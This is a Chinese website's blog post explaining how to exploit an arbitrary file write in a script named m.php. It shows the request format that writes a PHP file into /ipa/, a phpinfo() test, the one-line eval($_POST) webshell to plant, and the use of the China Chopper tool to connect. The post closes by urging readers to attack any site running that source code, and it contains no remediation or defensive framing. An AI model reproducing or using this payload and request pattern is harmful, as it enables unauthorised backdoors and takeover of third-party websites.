【麋鹿】利用源码漏洞教你入侵网站_网络安全_麋鹿资源网

麋鹿资源网 · 免费提供绿色软件、活动线报以及其他网络资源，好货不私藏！

麋鹿资源网永久地址发布页

麋鹿资源网

当前位置：首页 > 网络安全

【麋鹿】利用源码漏洞教你入侵网站

10-21 麋鹿站长 70404 0

话不多说，先讲一下这个漏洞

其实就是一个文件写入漏洞，我利用了这个漏洞写入了后门，就是这个API接口的漏洞

这源码里面的m.php文件可以任意写入文件

可以看到msb是文件名，msg这些参数是写入文件里面的，

使用get类型提交m.php?msb=kele&msg=测试，然后提交就会在/ipa/目录下多了个kele.php的文件，里面也有测试两个字

那么我把他换成<?php phpinfo();?>呢

然后再打开/ipa/kele.php文件

可以看到已经执行了php代码，然后在换成后门代码

<?php @eval($_POST['kele']); ?>

然后在用菜刀连接就好了[滑稽]

这就是个任意文件写入漏洞，看到这个源码搭建的站可以试试利用这个漏洞

标签：web渗透网络安全入侵

上一篇：【麋鹿】内网渗透思路简单介绍
下一篇：【麋鹿】资产扫描利器——AlliN

相关文章

相关评论

本栏最新更新

本栏推荐

阅读排行

广告合作 - 我要投稿 - 侵权处理 - Sitemap - 加入QQ群

免责声明：本网站所发布的全部内容都来源于互联网搬运

请你在下载后的24小时内进行删除处理，如果有侵权之处请第一时间联系我们删除。敬请谅解! E-mail：2113295600@qq.com

麋鹿版权所有Copyright © 2021-2021